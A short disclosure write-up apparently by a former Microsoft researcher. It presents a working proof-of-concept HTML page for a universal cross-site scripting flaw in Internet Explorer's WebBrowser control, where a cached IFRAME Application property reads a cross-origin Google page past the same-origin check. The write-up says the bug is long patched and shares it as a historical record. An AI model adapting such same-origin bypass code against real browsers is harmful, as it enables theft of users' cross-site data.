UXSS - Masked WebBrowser Control Cached Window

Caching the Application property of an IFRAME before navigating it to a cross-origin URL gives unrestricted access to the cross-origin document. The Application property returns the top-level WebBrowser Control object, and that object’s Document property bypasses the same-origin check entirely.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>XDOM_MaskedWBControlCachedWindow</title></head>
<body>
<font face="Tahoma" size="2">
<center>
<h2>XDOM_MaskedWBControlCachedWindow</h2>
<iframe id="crossDomainIframe" width="400" height="200"></iframe><br /><br />
</center>
<hr />

<font color="green">// Let's cache the "Application" (window) object...</font><br />
var <b>cachedWindow</b> = document.getElementById("<b>crossDomainIframe</b>").<b>Application</b>;<br/ ><br/ >

<font color="green">// Now we load (with no tricks) Google inside the IFRAME.</font><br />
document.getElementById("crossDomainIframe").contentWindow.<b>location.replace</b>("http://www.google.com");<br/ ><br/ >

<font color="green">// The rest is history...</font><br />
setTimeout('alert(<b>cachedWindow</b>.Document.body.innerHTML);',5000);
<hr />

</font>
<script language="JavaScript">
var cachedWindow = document.getElementById("crossDomainIframe").Application;
document.getElementById("crossDomainIframe").contentWindow.location.replace("http://www.google.com");
setTimeout('alert(cachedWindow.Document.body.innerHTML);',5000);
</script>
</body>
</html>

The Application property on an IFRAME element returns the IWebBrowser2 object representing the top-level browser instance. This object’s Document property provides access to the current document without performing a same-origin check at the application level. Caching this before the navigation means the reference stays valid after the IFRAME loads a different domain.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.